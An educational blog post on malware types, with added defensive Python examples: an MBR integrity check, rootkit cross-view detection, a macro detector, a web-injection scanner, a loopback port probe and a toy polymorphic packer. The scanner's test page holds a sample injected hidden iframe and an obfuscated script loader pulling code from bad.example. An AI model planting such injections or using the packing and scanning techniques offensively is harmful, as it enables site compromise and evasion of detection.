Malware part 3, What Is Malware?
Years ago I worked in landscaping. When a customer asked how to tell a weed from a desirable plant, we would tell them that a weed is any plant that grows where you don’t want it. Malware is short for “malicious software,” and you can think of it as any piece of software that’s running where you don’t want it. There are three basic types of malware: viruses, trojans, and worms.
Viruses
Just like a biological virus, a computer virus is a program that makes copies of itself to spread around. Once it has infected your computer, it will try to insert itself into other programs and files that you might share with somebody else, or it will try to create new files that might be copied onto removable media or sent through email. When someone else runs that program or opens that file, they’ll get infected too. Where a computer virus is different from a biological virus—well, most biological viruses—is that you have to do something to be infected. It doesn’t just happen. It won’t jump from one computer to another if they get too close to one another. You have to run the infected program or open the infected file in order to spread the infection. Viruses can be very nasty critters. They can erase or damage files, steal your private information, open more security holes, and even make your computer completely unusable.
There are four general kinds of viruses, and any one virus can fall into multiple categories:
- File Infector
- Boot Sector/MBR Virus
- Rootkit
- Macro Virus
The first type of virus is a file infector. Just like it sounds, it infects other files. When its code is executed, it searches for a particular file or type of file (usually other programs) and either appends itself to that file or overwrites part of it with a copy of itself. Every time you run an infected file, that code executes again and tries to spread into yet more files.
The second type of virus is a boot sector virus. Before flash drives, the most common removable storage was the floppy disk, a small spinning magnetic disk, and boot sector viruses spread from floppy to floppy. Traditional hard drives are still spinning disks (aka platters) inside a small metal box. A disk is divided into sectors, and the very first sector is the boot sector. On a hard drive that first sector is called the Master Boot Record (MBR): it holds a small piece of boot code, a table describing up to four partitions (pieces of the drive that each act like a separate drive), and a two-byte signature that tells the BIOS the sector is bootable. Each partition has its own boot sector, which the MBR code loads next. Flash drives have no platters, but they present themselves to the computer as a block device made of 512-byte logical sectors, so they have a boot sector too, and the BIOS treats them the same way rather than being as confused as I’m sure you must be right about now. One caveat: newer machines that boot through UEFI from a GPT-partitioned disk never execute MBR code at all, which closes this particular door.
As a computer boots up, it runs code from several different locations. First, it runs the BIOS or Basic Input/Output System that is stored in a chip on the motherboard. When you see the Dell or HP or some other manufacturer’s logo, that’s the BIOS. Instead of a logo, sometimes you might see the computer clearing or testing memory or detecting the presence of drives and other devices. You should also see a message telling you to press a key to enter Setup, usually F2 or Esc or some other key or combination of keys. If you press that key and look into your computer’s BIOS setup, you will see something called boot order or boot priority. This is a list of the devices on which the BIOS will look for a bootable OS like Windows or Mac OS X, in the order it will try them: typically entries such as Removable Devices, Hard Drive, and CD-ROM/DVD Drive.
If you select Removable Devices, you would be able to choose from whatever removable devices, such as DVD or flash drives, are installed on your computer. You can change this order so that the computer will always try to boot from a particular device first.
After the computer loads the BIOS, it looks for a boot sector on the first device in the boot list and runs whatever code it finds there. If that code is a virus, the virus runs first and can then write itself into the boot sectors of the other drives and removable media attached to the system. Since it’s running before the OS ever loads, there is no AV software to intercept it, and it can do pretty much anything it wants, including lying to the OS about what is on the disk once the OS is up. These very nasty bugs frequently cannot be removed by AV software running inside the infected OS even when they are detected. The alternatives are to rewrite the boot sector from a clean boot environment, such as recovery media, or to format the infected drives and reinstall everything, affectionately known in the computer support world as a nuke-and-pave. Formatting a drive erases everything, so make sure you have a good backup of all your files before attempting it! I don’t recommend you attempt a low level format. If you think that might be necessary, you should call in a professional.
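To make the boot sector concrete, here is an added example (code written for this edit, not from the original post) that pulls apart a 512-byte MBR and performs the one check that catches a boot sector infection: hashing the 446 bytes of boot code and comparing them with a hash taken when the machine was known to be clean. The sample MBRs are constructed in the script; real boot code is x86 machine code, and only its first few bytes are imitated here. The infected sample keeps the partition table intact, which is what a real boot sector virus does so that the computer still boots normally.

```python
import hashlib
import struct

SECTOR_SIZE = 512
BOOT_CODE_LEN = 446      # bytes 0..445: the bootstrap code the BIOS jumps into
PART_TABLE_OFF = 446     # four 16-byte partition entries follow the code
SIGNATURE_OFF = 510      # the last two bytes must be 0x55 0xAA


def parse_mbr(sector: bytes) -> dict:
    """Split a raw MBR into a boot-code hash and its partition table."""
    if len(sector) != SECTOR_SIZE:
        raise ValueError("an MBR is exactly one 512-byte sector")
    if sector[SIGNATURE_OFF:] != b"\x55\xaa":
        raise ValueError("missing 0x55AA boot signature: not a valid MBR")
    partitions = []
    for i in range(4):
        entry = sector[PART_TABLE_OFF + 16 * i: PART_TABLE_OFF + 16 * (i + 1)]
        # entry layout: status(1) CHS-start(3) type(1) CHS-end(3) LBA-start(4) length(4)
        status, ptype, lba_start, length = struct.unpack("<B3xB3xII", entry)
        if ptype == 0:          # empty slot
            continue
        partitions.append({"slot": i, "bootable": status == 0x80, "type": ptype,
                           "lba_start": lba_start, "sectors": length})
    boot_code = sector[:BOOT_CODE_LEN]
    return {"boot_code_sha256": hashlib.sha256(boot_code).hexdigest(),
            "partitions": partitions}


def boot_code_matches(sector: bytes, known_good_sha256: str) -> bool:
    """The check: compare the boot code with a hash recorded while the machine
    was known to be clean. Any difference is something that must be explained."""
    return parse_mbr(sector)["boot_code_sha256"] == known_good_sha256


def build_sample_mbr(boot_code: bytes) -> bytes:
    """Constructed test data: one bootable NTFS-type partition starting at LBA 2048."""
    code = boot_code.ljust(BOOT_CODE_LEN, b"\x00")
    entry = struct.pack("<B3sB3sII", 0x80, b"\x01\x01\x00", 0x07, b"\xfe\xff\xff", 2048, 1_000_000)
    table = entry + b"\x00" * 48          # three empty slots
    return code + table + b"\x55\xaa"


# Constructed stand-ins for real boot code: cli / xor ax,ax / mov ss,ax / mov sp,7C00h
CLEAN_MBR = build_sample_mbr(b"\xfa\x33\xc0\x8e\xd0\xbc\x00\x7c")
BASELINE = parse_mbr(CLEAN_MBR)["boot_code_sha256"]
# A boot sector virus replaces the code but keeps the partition table so the OS still boots.
INFECTED_MBR = build_sample_mbr(b"\xeb\x3c\x90" + b"\x90" * 20)

if __name__ == "__main__":
    for label, mbr in (("clean", CLEAN_MBR), ("infected", INFECTED_MBR)):
        print(label, "boot code matches baseline:", boot_code_matches(mbr, BASELINE))
    print("partitions:", parse_mbr(INFECTED_MBR)["partitions"])
```

To run it against a real disk, read the first 512 bytes of the physical device (on Linux, `dd if=/dev/sda bs=512 count=1` as root; on Windows, open `\\.\PhysicalDrive0`) and record the hash while the machine is trusted. The hash will legitimately change when a boot loader is reinstalled, so keep the baseline with the rest of your build notes.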
A rootkit is similar to a boot sector virus in that it runs at the same level as the operating system itself, as a driver, a kernel module, or a patched system file, so antivirus software has no trustworthy vantage point above it. They can be very sneaky beasts indeed. A rootkit operates by replacing or inserting itself into important OS files, and it knows some neat tricks for hiding. Normally, when your AV software scans your system, it checks the files and configuration on your computer for suspicious looking code. It will even look into hidden and system files that a user normally wouldn’t see. To look at those files, the AV software must go through the OS. But what if the part of the OS that serves up the files has been hijacked? When the AV asks to look at an infected file, the rootkit can show it the original, uninfected file instead, or simply leave its own files out of the directory listing, fooling the scanner into thinking there’s nothing wrong. That is playing seriously dirty. Other tricks of rootkits include opening backdoors or even altering the login software to give unauthorized users access to the system. Rootkits are understandably difficult to detect and notoriously hard to remove. The reliable way to see past the hiding is to look from outside: scan the disk from clean boot media, where the rootkit’s code is not running, or compare what the OS reports with what a lower-level view of the same disk shows. As with boot sector viruses, sometimes the only way to remove a rootkit is to do a nuke-and-pave.
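The comparison trick, known as cross-view detection, is easier to see in code. The following is an added example written for this edit, not code from the original post, and it is a simulation: the "hook" is an ordinary Python function that filters a directory listing the way a rootkit’s hooked system call would, and the "raw" view is the unhooked listing. In a real tool the low-level view comes from parsing the filesystem structures on disk yourself, or from scanning while booted from clean media. The hidden-name prefix and the sample directory are constructed for the demonstration.

```python
import os
import tempfile

HIDE_PREFIX = "$sys$"   # constructed: the simulated rootkit hides names starting with this


def hooked_listdir(path: str) -> list:
    """Simulated hooked API: the rootkit filters the real answer before the
    caller (an AV scanner, Explorer, or 'dir') ever sees it."""
    return [n for n in os.listdir(path) if not n.startswith(HIDE_PREFIX)]


def raw_listdir(path: str) -> list:
    """Stand-in for an independent, lower-level view of the same directory."""
    return [entry.name for entry in os.scandir(path)]


def cross_view_diff(path: str) -> list:
    """Cross-view detection: anything the low-level view has that the
    high-level view lacks is being hidden from the operating system."""
    return sorted(set(raw_listdir(path)) - set(hooked_listdir(path)))


def build_sample_dir() -> str:
    """Constructed directory: two ordinary files and one the 'rootkit' hides."""
    d = tempfile.mkdtemp(prefix="rootkit_demo_")
    for name in ("notes.txt", "report.doc", HIDE_PREFIX + "driver.sys"):
        with open(os.path.join(d, name), "w"):
            pass
    return d


if __name__ == "__main__":
    d = build_sample_dir()
    print("what the scanner is shown:", hooked_listdir(d))
    print("what is actually there:   ", raw_listdir(d))
    print("hidden entries:           ", cross_view_diff(d))
```

The same idea applies to processes, registry keys, and network ports: enumerate each through the normal API and through an independent path, and investigate whatever appears in only one of them.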
A macro virus doesn’t attack the computer’s operating system or just any executable file it finds. Instead, it targets a particular application that makes use of macros. A macro is a set of common tasks that many programs will let you automate. For example, you can have a spreadsheet that makes automatic calculations when you open it or a text document that applies a particular format to a block of text whenever you press Ctrl-Alt-F1 or some other combination of keys. Macros can save you a lot of time if you know how to use them. Unfortunately, the more powerful the macro tools that a program supports, the more potential there is for misuse.
In Microsoft Office you can use a programming language called Visual Basic for Applications (VBA) to create very complex macros. Back in the mid 90s, I wrote a macro for Microsoft Excel that would collect data from time-sheets and print out workers’ compensation insurance forms based on job classifications and hours worked. That saved my employer many hours of labor and eliminated several potential sources of book-keeping errors. Macros like that are great tools for streamlining business processes, but the very things that make them so useful also make them dangerous: a macro can run automatically when a document is opened, and VBA can write files, launch other programs, and send email. The problem isn’t limited to Microsoft products. Any program that supports programmable macros, even on a Mac, can be infected by a macro virus.
If you get a macro virus, it’s probably because somebody emailed or otherwise shared an infected file with you. When you opened that document or spreadsheet or whatever it was, the infected macro executed and installed itself into other documents or into the application’s own template (in Word, the global template that every new document is based on). Macro viruses aren’t as common these days because the companies that make the vulnerable software have added better security features: recent versions of Office disable macros in a freshly opened document by default and ask before running them, and macro-enabled files carry their own extensions (.docm rather than .docx, .xlsm rather than .xlsx) so they can be filtered at the mail gateway. The people who make viruses have mostly turned their attention elsewhere.
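That filtering is worth showing. The script below is an added example written for this edit, not code from the original post: it opens a modern Office file, which is a zip archive, and reports whether it carries VBA using two independent signals, the presence of a vbaProject.bin part and the macro-enabled content types declared in the package manifest. The content-type strings are the real ones Office uses; the two sample documents are constructed in the script and contain only the parts needed for the check. Legacy .doc and .xls files are a different (OLE2) format and need a different parser.

```python
import io
import zipfile

# Content types that only appear in macro-enabled OOXML packages.
MACRO_CONTENT_TYPES = (
    "application/vnd.ms-office.vbaProject",
    "application/vnd.ms-word.document.macroEnabled.main+xml",
    "application/vnd.ms-excel.sheet.macroEnabled.main+xml",
    "application/vnd.ms-powerpoint.presentation.macroEnabled.main+xml",
)


def macro_report(blob: bytes) -> dict:
    """Inspect an OOXML file (.docx/.docm/.xlsx/.xlsm/...) for embedded VBA."""
    if not zipfile.is_zipfile(io.BytesIO(blob)):
        raise ValueError("not an OOXML container (legacy .doc/.xls need an OLE2 parser)")
    with zipfile.ZipFile(io.BytesIO(blob)) as z:
        names = z.namelist()
        vba_parts = [n for n in names if n.lower().endswith("vbaproject.bin")]
        manifest = ""
        if "[Content_Types].xml" in names:
            manifest = z.read("[Content_Types].xml").decode("utf-8", "replace")
        declared = [ct for ct in MACRO_CONTENT_TYPES if ct in manifest]
    return {
        "has_vba": bool(vba_parts) or bool(declared),
        "vba_parts": vba_parts,
        "declared": declared,
        # the two signals should agree; a file where they differ deserves a closer look
        "inconsistent": bool(vba_parts) != bool(declared),
    }


def build_sample_docx(with_macros: bool) -> bytes:
    """Constructed minimal Word package; real files carry many more parts."""
    main_ct = ("application/vnd.ms-word.document.macroEnabled.main+xml" if with_macros else
               "application/vnd.openxmlformats-officedocument.wordprocessingml.document.main+xml")
    overrides = f'<Override PartName="/word/document.xml" ContentType="{main_ct}"/>'
    if with_macros:
        overrides += ('<Override PartName="/word/vbaProject.bin" '
                      'ContentType="application/vnd.ms-office.vbaProject"/>')
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as z:
        z.writestr("[Content_Types].xml",
                   '<?xml version="1.0" encoding="UTF-8"?>'
                   '<Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types">'
                   + overrides + "</Types>")
        z.writestr("word/document.xml", "<w:document/>")
        if with_macros:
            # a real vbaProject.bin is an OLE2 compound file; only its magic bytes are reproduced
            z.writestr("word/vbaProject.bin", b"\xd0\xcf\x11\xe0\xa1\xb1\x1a\xe1" + b"\x00" * 56)
    return buf.getvalue()


if __name__ == "__main__":
    for label, blob in (("plain .docx", build_sample_docx(False)),
                        ("macro .docm", build_sample_docx(True))):
        print(label, macro_report(blob))
```

Checking the contents rather than trusting the file extension matters because the extension is the one thing the sender controls completely; a gateway rule that only blocks "*.docm" misses a macro-bearing file that has been renamed.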
Trojans
Computer trojans are named for the Trojan Horse of Greek legend. In the story, the attacking Greeks gave a giant wooden horse to the city of Troy. Thinking this was a really grand gift, the Trojans brought it inside the gates. Later that night, when no one was watching, the horse opened up, spilling Greek invaders into the city, wreaking havoc behind the city’s defenses and opening the gates for the rest of the Greek army. Although there are no actual Greek invaders hidden inside computer trojans, they behave very similarly.
A trojan is a program that appears to be one thing, but actually does something more sinister in secret. They frequently come to you disguised as email attachments and useful, downloadable widgets like screensavers, Internet browser plugins, and—most ironically—antivirus programs. Once installed, they create security vulnerabilities that allow someone to access your computer remotely or to steal your information. Trojans differ from viruses in that they don’t normally infect other files or automatically try to spread themselves.
There are five basic kinds of trojans: downloaded-file trojans, spyware, adware, website trojans, and rogue antivirus.
Downloaded file trojans are just what they sound like. They are files that you or someone else downloads from the Internet onto your computer. It might be a cool little widget that claims to make your computer run faster or insert cute smiley faces into your emails, and maybe it really does what it claims. The problem is that it also does something else that nobody told you about.
Spyware is software that watches what you do and reports it to someone else. Many helpful toolbars that you can install into your Web browser keep a record of every website you visit. Usually, these programs aren’t malicious; they’re just invasive. They want to collect data on your interests so they can present more targeted advertisements. You might even knowingly install spyware to keep tabs on your children or employees. Such programs aren’t always benign, however. Some spyware will record everything you type on your keyboard, stealing passwords, credit card numbers, and other personal data.
Adware is similar to spyware and there is a lot of overlap. Adware can slow your computer down, but its primary purpose is to get you to look at someone’s advertising. To help in its task, it might record your Internet browsing in order to feed you advertising that’s more likely to catch your attention. Adware usually takes the form of a helpful application like instant messaging, a calendar, or real-time weather reports. It’s not usually malicious, but remains a problem because of its intrusiveness and the negative impact it can have on your computer’s performance.
Website trojans, often called drive-by downloads, are a fairly recent development that grew out of Web technologies like JavaScript, ActiveX, and Shockwave/Flash. JavaScript is built into the browser and the others are plugins; they can do some very cool things, like display animations and play games, but to do them they get more access to files and processes on your computer than any web page should have, and a bug in any of them can be exploited by a page you merely visit. When you visit a site that is infected with a website trojan (and the site owner might not even know about it, because attackers typically inject a hidden frame or a few lines of scrambled script into otherwise legitimate pages), it will try to get you to click on a pop-up advertisement or load some other web page. Sometimes this very sneaky malware will start downloading malicious code to your computer without doing anything else visible. Hundreds of thousands of web sites are infected.i The most effective protection is to keep the browser and its plugins patched, since drive-by downloads usually rely on known holes in outdated versions; disabling scripting and plugins helps too, but if you do that, you also lose a lot of functionality on some web sites. Another workable step is to use Mozilla Firefox or Google Chrome for your Web browsing instead of Internet Explorer, which has been plagued by security problems from the very beginning.
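Because the site owner is usually the last to know, it helps to be able to check your own pages. The scanner below is an added example written for this edit, not code from the original post. It uses only the standard library and flags the three tell-tales that the mass injections of this period left behind: an iframe sized to zero or styled invisible, a script loaded from a host other than your own, and inline script that decodes itself before running. The two sample pages and the host name bad.example are constructed for the demonstration.

```python
from html.parser import HTMLParser
from urllib.parse import urlparse

# Functions that injected script uses to unscramble itself before running.
OBFUSCATION_MARKERS = ("unescape(", "eval(", "fromCharCode")


class InjectionScanner(HTMLParser):
    """Collects (kind, detail, line) findings while parsing one page."""

    def __init__(self, site_host: str):
        super().__init__()
        self.site_host = site_host.lower()
        self.in_script = False
        self.findings = []

    def handle_starttag(self, tag, attrs):
        a = {k.lower(): (v or "") for k, v in attrs}
        line = self.getpos()[0]
        if tag == "iframe":
            style = a.get("style", "").replace(" ", "").lower()
            tiny = (a.get("width", "").strip() in ("0", "1")
                    or a.get("height", "").strip() in ("0", "1"))
            hidden = "display:none" in style or "visibility:hidden" in style
            if tiny or hidden:
                self.findings.append(("hidden-iframe", a.get("src", ""), line))
        elif tag == "script":
            self.in_script = True
            host = (urlparse(a.get("src", "")).hostname or "").lower()
            if host and host != self.site_host:       # relative URLs have no host
                self.findings.append(("third-party-script", a.get("src", ""), line))

    def handle_endtag(self, tag):
        if tag == "script":
            self.in_script = False

    def handle_data(self, data):
        if self.in_script and any(m in data for m in OBFUSCATION_MARKERS):
            self.findings.append(("obfuscated-inline-script", data.strip()[:40], self.getpos()[0]))


def scan_html(html: str, site_host: str) -> list:
    """Return every suspicious element found in html for a site served from site_host."""
    p = InjectionScanner(site_host)
    p.feed(html)
    p.close()
    return p.findings


# Constructed sample pages: a clean one, and the same page with an injection appended.
CLEAN_PAGE = """<html><head>
<script src="/js/site.js"></script>
<script src="https://www.example.com/js/app.js"></script>
</head><body><h1>Welcome</h1><script>var visits = 1 + 1;</script></body></html>"""

INJECTED_PAGE = CLEAN_PAGE.replace(
    "</body>",
    '<iframe src="http://bad.example/in.php" width="0" height="0" style="visibility:hidden"></iframe>'
    '<script src="http://bad.example/load.js"></script>'
    "<script>document.write(unescape('%3Cscript src=%22http://bad.example/x.js%22%3E%3C/script%3E'))"
    "</script></body>")

if __name__ == "__main__":
    print("clean page:   ", scan_html(CLEAN_PAGE, "www.example.com"))
    print("injected page:", scan_html(INJECTED_PAGE, "www.example.com"))
```

Run it over a saved copy of each page on the site (or fetch them the way a visitor would, since some injections only appear for certain browsers or referrers) and treat any finding you did not put there yourself as a compromise of the web server, not just of the page.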
One of the worst kinds of trojans I’ve seen in recent years is rogue antivirus. This is malware that masquerades as antivirus software with official sounding names like Internet Security 2010. Have you ever seen an advertising banner or a pop-up ad on the Internet that says “Viruses detected on your computer! Click here to remove now!” Well, that’s the beast itself. Don’t click on those advertisements. They’ll give you a virus even faster than would a porn site. Once installed on your computer, a rogue antivirus will disable your real antivirus, your firewall, and other security software and then start downloading and installing more malware wholesale. If left too long, your computer might require some severely invasive procedures to find healing. (Think, “Nuke-and-pave.”)
Worms
Viruses and trojans usually depend on you doing something in order to infect your computer. You have to open an infected file or visit an infected website. Worms are different in that you don’t have to do anything to get one. They’re like bad neighbors who are always nosing around and inviting themselves in at the most inopportune moments.
Computer worms take advantage of operating system and software vulnerabilities that started out as features. When computer engineers first began to connect computers together, they were configured to “listen” for calls on the network with no user intervention required.
Computer 1: “Hello, this is Computer 1 calling for Computer 2 on port 22. Is anyone home?”
Computer 2: “Hi Computer 1! This is Computer 2 answering your call on port 22. What can I do for you?”
Computer 1 would then proceed to send commands to Computer 2.
The original intent of this process was to exchange legitimate messages or data, but very quickly some people realized that they could use this same method for any number of nefarious purposes. If the listening program has a bug, you can use it to copy viruses to another computer, completely bypassing the end users. Since worms became common in the 1990s, most operating systems and major software packages have been redesigned to prevent the most obvious vectors for infection. Most routers, even home network routers, have built in firewalls to prevent unsolicited connection attempts. Microsoft added a basic firewall to Windows XP (turned on by default from Service Pack 2) and later versions of Windows, and most antivirus packages now include a firewall component as well.
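The exchange sketched above, as an added example written for this edit rather than code from the original post: one function plays Computer 2, a service that binds a port and answers any caller with a banner and no human involved, and another plays the first thing a worm does, which is probe addresses and ports to find such services. It runs entirely on the loopback interface, asks the operating system for a free port instead of assuming port 22, and the banner text is constructed for the demonstration.

```python
import socket
import threading


def start_listener(host: str = "127.0.0.1", port: int = 0):
    """Computer 2: bind a TCP port and answer every connection with a banner.
    Port 0 asks the OS for a free port; the real port number is returned."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    srv.bind((host, port))
    srv.listen(5)
    bound_port = srv.getsockname()[1]

    def serve():
        while True:
            try:
                conn, _ = srv.accept()        # blocks until someone calls; nobody has to click anything
            except OSError:
                return                         # listener closed: shut the thread down
            with conn:
                conn.sendall(f"Computer 2 answering your call on port {bound_port}\n".encode())

    threading.Thread(target=serve, daemon=True).start()
    return srv, bound_port


def probe(host: str, port: int, timeout: float = 0.5):
    """Computer 1: return the banner if something answers on host:port,
    '' if the connection was accepted silently, or None if nothing is listening."""
    try:
        with socket.create_connection((host, port), timeout=timeout) as s:
            try:
                return s.recv(256).decode(errors="replace").strip()
            except socket.timeout:
                return ""
    except OSError:
        return None


def find_listeners(host: str, ports, timeout: float = 0.5) -> dict:
    """The worm's first step: map which ports on a host have a service waiting."""
    return {p: banner for p in ports if (banner := probe(host, p, timeout)) is not None}


if __name__ == "__main__":
    srv, port = start_listener()
    print("scanning around port", port, "->", find_listeners("127.0.0.1", range(port - 2, port + 3)))
    srv.close()
```

Everything a worm does after this point depends on a flaw in whatever answered; the scan itself only needs the service to be reachable, which is why a firewall that drops unsolicited connections removes the whole attack surface from the network side, and why a service that must be reachable has to be patched.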
Even with all those added layers of protection, computer worms remain one of the most prevalent and dangerous forms of malware around.
Polymorphic Viruses
Antivirus scanners search through files for known pieces of virus code, called signatures. In order to avoid detection, a polymorphic virus changes its own internal structure every time it copies itself. Typically it scrambles (encrypts) the working part of the virus with a different key for each copy, prepends a small decoder that unscrambles it at run time, and pads the result with varying amounts of meaningless bits, so no two copies share a long run of identical bytes; the most advanced ones rearrange the decoder itself as well, and some even vary their behavior. All of the most destructive types of malware (viruses, trojans, and worms) can also be polymorphic. Because it takes a much more sophisticated programmer to create them, these critters are much more difficult to spot and remove, and are much more likely to be dangerous. They aren’t as common as simpler viruses yet but are quickly becoming the norm.
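Here is the cat-and-mouse in miniature, as an added example written for this edit and not code from the original post. A plain signature scanner is run against a harmless text payload (constructed; it stands in for virus code and is never executed), then against two freshly generated variants of that payload. The packer format, its "PV1" header, and the XOR-with-a-random-key scrambling are all constructed for the demonstration; real engines use the same idea with real encryption and machine-code decoders.

```python
import os

PAYLOAD = b"DEMO-PAYLOAD: harmless text standing in for virus code"   # constructed sample
SIGNATURES = {
    "demo.payload": PAYLOAD[:16],   # what an analyst would extract from the plain sample
    "demo.decoder": b"PV1",         # the one constant part of a variant: the decoder header
}


def scan(blob: bytes, signatures: dict) -> list:
    """Plain signature scanner: names of every known byte pattern found in blob."""
    return [name for name, sig in signatures.items() if sig in blob]


def make_variant(payload: bytes) -> bytes:
    """Polymorphic packer (constructed container format):
       b'PV1' | key | junk_len | junk bytes | payload_len (2 bytes) | payload XOR key
    A fresh key and a random amount of filler make every copy's bytes differ."""
    key = os.urandom(1)[0] or 1                      # never 0: XOR with 0 changes nothing
    junk = os.urandom(1 + os.urandom(1)[0] % 16)     # 1..16 bytes of meaningless filler
    encoded = bytes(b ^ key for b in payload)
    return b"PV1" + bytes([key, len(junk)]) + junk + len(encoded).to_bytes(2, "big") + encoded


def decode_variant(variant: bytes) -> bytes:
    """The decoder stub: the part a variant runs first to restore the real code."""
    if variant[:3] != b"PV1":
        raise ValueError("not a PV1 variant")
    key, junk_len = variant[3], variant[4]
    pos = 5 + junk_len
    n = int.from_bytes(variant[pos:pos + 2], "big")
    return bytes(b ^ key for b in variant[pos + 2:pos + 2 + n])


if __name__ == "__main__":
    v1, v2 = make_variant(PAYLOAD), make_variant(PAYLOAD)
    print("plain sample hits:", scan(PAYLOAD, SIGNATURES))
    print("variant 1 hits:   ", scan(v1, SIGNATURES))
    print("variants differ:  ", v1 != v2)
    print("both decode back: ", decode_variant(v1) == PAYLOAD and decode_variant(v2) == PAYLOAD)
```

The payload signature never matches a variant, but the decoder signature does, which is exactly where scanners moved next: matching the decoder, or running the file in an emulator until it has unscrambled itself and then scanning the result. The advanced polymorphic engines mentioned above answer that by rewriting the decoder itself on every copy.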
They’re All the Same Anyway
Having described all these different kinds of viruses, now I have to tell you that the differences are largely disappearing. Worms, trojans, viruses, spyware…most common malware these days could actually fall into any and all of those categories. You might get an email notification of a password change to your Facebook account or from a friend telling you about this crazy video of you he found on YouTube. You click on an enclosed link to a website that isn’t actually Facebook or YouTube. That website installs a rogue antivirus on your computer which then spies on you, steals your information, creates backdoors into your computer, uses it to find and attack other computers on your home or office network, and turns them all into zombies to send more bogus password change notices. Villainous isn’t it? The work of truly evil non-geniuses.
Virus Hoaxes
Have you ever received an email that said, “If you get an email with such-and-such subject, don’t open it! It will steal your banking information, send pornographic emails to all your friends, erase your entire hard drive, set your monitor on fire, and maybe even pick your friend’s nose! DON’T OPEN IT! Delete it immediately! If you love your family and friends, send this message on to everyone in your address book right now, or you’ll have bad luck for the next 70 years!!!!” In case you didn’t already know, that email was a hoax. Your friend who sent it to you probably thought he was telling you something important, but in reality he was just filling up your inbox with garbage, wasting your valuable time, and clogging up your email server’s spam filters. I haven’t seen as many of these warnings in recent years, but there was a time when they were a much bigger problem than the viruses from which they purported to save us!
Viruses can do a lot of bad things, but most hoax virus warnings are over the top. Here are some things that malware can do:
- Corrupt data and files
- Delete some files
- Steal your passwords and other information that you type or store on your computer
- Make your computer run slower
- Send copies of itself to other people
- Steal email addresses from your address book
- Send spam to everyone in the world
- Hijack your Internet browser
- Cause error messages
- Reboot your computer
I’m sure there are many other things that I could add to this list, but you get the idea: Computer viruses can be bad, but they aren’t omnipotent. They can’t set your house on fire. They almost never damage your computer’s hardware (the rare exception is malware that overwrites a machine’s firmware, as the 1998 CIH virus did to some BIOS chips, and even that is repairable). They can’t blow anything up or kill anyone (at least not directly). They rarely erase a whole hard drive, since a computer that won’t boot is no use to the attacker, though malware that does exactly that has existed. In general, emailed virus warnings are much more of a nuisance than a help. Here are some tips to help you spot virus hoaxes:
- It describes unlikely effects of the supposed virus.
- The subject or major parts of the email are in all capitals. Legitimate press releases and stories about real life computer viruses don’t shout. Sometimes the news stories might be inaccurate or exaggerated, but they usually try to maintain a professional appearance.
- Microsoft, Apple, and other well-known companies will never send you an email about a new and dangerous virus unless you specifically requested it.
- Legitimate virus warnings will almost never arrive via email.
- No reputable company will ever tell you to forward an email to all your friends no matter the subject or how important it might be. (And on that note, they will also never offer to reward you with cash or prizes if you forward an email.)
i. Staples Network Services by Thrive, “Thrive Tech Brief: September 2009/Website Malware,” Thrive Networks, accessed 01/04/2010, http://www.thrivenetworks.com/resources/september-2009-website-malware.html